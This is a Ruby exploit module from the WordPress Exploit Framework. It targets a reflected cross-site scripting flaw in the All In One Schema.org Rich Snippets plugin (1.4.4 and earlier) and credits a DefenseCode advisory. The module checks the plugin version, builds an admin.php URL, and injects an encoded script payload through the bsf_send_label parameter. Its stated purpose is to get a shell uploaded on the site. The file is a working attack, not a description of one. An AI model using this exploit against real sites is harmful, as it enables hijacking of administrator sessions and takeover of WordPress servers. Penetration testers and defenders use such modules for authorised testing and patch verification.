# frozen_string_literal: true

class Wpxf::Exploit::AllInOneSchemaRichSnippetsReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss
  include ERB::Util

  def initialize
    super

    update_info(
      name: 'All In One Schema.org Rich Snippets <= 1.4.4 Reflected XSS Shell Upload',
      author: [
        'DefenseCode', # Discovery
        'rastating'    # WPXF module
      ],
      references: [
        ['WPVDB', '8834'],
        ['URL', 'http://www.defensecode.com/advisories/DC-2017-01-002_WordPress_All_In_One_Schemaorg_Rich_Snippets_Plugin_Advisory.pdf']
      ],
      date: 'May 24 2017'
    )
  end

  def check
    check_plugin_version_from_readme('all-in-one-schemaorg-rich-snippets', '1.4.5')
  end

  def vulnerable_url
    normalize_uri(wordpress_url_admin, 'admin.php')
  end

  def url_payload
    url_encode("</script><script>#{xss_ascii_encoded_include_script}</script>")
  end

  def url_with_xss
    "#{vulnerable_url}?page=rich_snippet_dashboard&bsf_force_send=true&bsf_send_label=#{url_payload}"
  end
end
